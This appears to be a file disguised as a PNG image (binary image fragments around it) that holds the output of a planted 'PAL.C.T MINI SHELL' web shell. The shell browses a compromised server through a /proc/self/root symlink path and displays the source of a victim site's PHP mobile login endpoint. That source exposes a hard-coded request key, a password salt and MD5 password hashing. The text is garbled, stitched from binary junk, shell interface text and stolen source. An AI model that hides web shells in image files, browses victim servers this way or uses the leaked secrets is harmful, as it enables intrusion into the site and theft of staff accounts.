php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/var/www/html/sub/images/sym/root/var/www/html/FTFL/mobile/
upload
files >> //proc/self/root/var/www/html/sub/images/sym/root/var/www/html/FTFL/mobile/masuklogin.php

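<?php
    /*
     * Mobile login endpoint.
     *
     * Reads kunci/user/pass/long/lat from the POST body, records the attempt
     * in android_post, verifies the request key, looks the staff member up by
     * username and password hash, then checks account status and the |apps|
     * permission. Every outcome is emitted as a one-element JSON array holding
     * an object with status ('sukses' or 'gagal'), subject and result.
     */
    require('inc/konekmobile.php');
    $myObj = new stdClass();

    // Treat absent or non-string (e.g. array) POST fields as empty strings so
    // the concatenations and bound parameters below always receive strings.
    $postString = function ($field) {
        return (isset($_POST[$field]) && is_string($_POST[$field])) ? $_POST[$field] : '';
    };

    $kunci = $postString('kunci');
    $username = $postString('user');
    $password = $postString('pass');
    $long = $postString('long');
    $lat = $postString('lat');

    // Audit record of the login attempt.
    // $r is presumably the mysqli connection set up by inc/konekmobile.php — confirm.
    // The submitted password is deliberately NOT written to the log: storing it
    // in clear text would expose credentials to anyone able to read android_post.
    // NOTE(review): $kunci is an MD5 over a static key plus the password, so a
    // logged value may still allow offline guessing; consider dropping it too.
    $uuid_member = 'COBA LOGIN';
    $waktu = date('Y-m-d H:i:s');
    $data_post = $kunci."||".$username."||[REDACTED]||".$long."||".$lat;
    $tentang = 'COBA LOGIN';
    $insertLog = $r->prepare("INSERT INTO android_post SET uuid_member=?, waktu=?, data_post=?, tentang=? ");
    $insertLog->bind_param('ssss',$uuid_member,$waktu,$data_post,$tentang);
    $insertLog->execute();

    // Request key check. hash_equals() compares the two strings byte for byte
    // in constant time; the previous loose != let PHP compare numeric-looking
    // hash strings as numbers, so unequal values could be accepted as equal.
    // NOTE(review): the key is hard-coded and shipped in the client app, and
    // the fields are concatenated without separators; neither is a strong
    // request-authentication scheme. Changing it needs a coordinated client update.
    $expectedKunci = md5('eFTeeFeL'.$username.$password.$long.$lat);
    if (!hash_equals($expectedKunci, $kunci)) {
        $myObj->status = 'gagal';
        $myObj->subject = 'aplikasi tidak dikenal.';
        $myObj->result = '';
        echo json_encode(array($myObj));
        exit();
    }

    // NOTE(review): passwords are stored as MD5 with one static prefix, which
    // is fast to brute-force if the staff table leaks. Migrating to
    // password_hash()/password_verify() requires re-hashing stored values, so
    // it is flagged here rather than changed in place.
    $md5password = md5("CariO111set".$password);
    $fetchUsername = $r->prepare("SELECT uuid_staff, nama_staff, foto_ktp, jenis_toko, wewenang, jabatan, username, status  FROM staff WHERE username=? AND password=?");
    $fetchUsername->bind_param('ss',$username,$md5password);
    $fetchUsername->execute();
    $resultFetchUsername = $fetchUsername->get_result();
    $FOUND_USER = $resultFetchUsername->num_rows;

    // No row means the username/password pair did not match.
    if ($FOUND_USER === 0) {
        $myObj->status = 'gagal';
        $myObj->subject = 'Username dan Password salah.';
        $myObj->result = "";
        echo json_encode(array($myObj));
        exit();
    }

    $userDb = $resultFetchUsername->fetch_assoc();
    $status_staff = $userDb['status'];
    // 'toko' is jenis_toko with its first character dropped.
    $userDb['toko'] = substr($userDb['jenis_toko'],1);

    // Only accounts whose status is exactly 'AKTIF' may log in.
    if ($status_staff !== 'AKTIF') {
        $myObj->status = 'gagal';
        $myObj->subject = 'Anda tidak dapat login karena berstatus '.$status_staff;
        $myObj->result = "";
        echo json_encode(array($myObj));
        exit();
    }

    $wewenang_staff = $userDb['wewenang'];
    $nama_staff = strtoupper($userDb['nama_staff']);

    // The permission list must contain the |apps| token (case-insensitive).
    if (!stristr($wewenang_staff,'|apps|')) {
        $myObj->status = 'gagal';
        $myObj->subject = 'Anda tidak mempunyai wewenang untuk memakai aplikasi.';
        $myObj->result = "";
        echo json_encode(array($myObj));
        exit();
    }

    // Success: return the selected staff columns plus the derived 'toko' value.
    // The SELECT above does not include the password column.
    $result = $userDb;

    $myObj->status = 'sukses';
    $myObj->subject = 'Selamat datang '.$nama_staff;
    $myObj->result = $result;
    echo json_encode(array($myObj));

    exit();

?>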
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`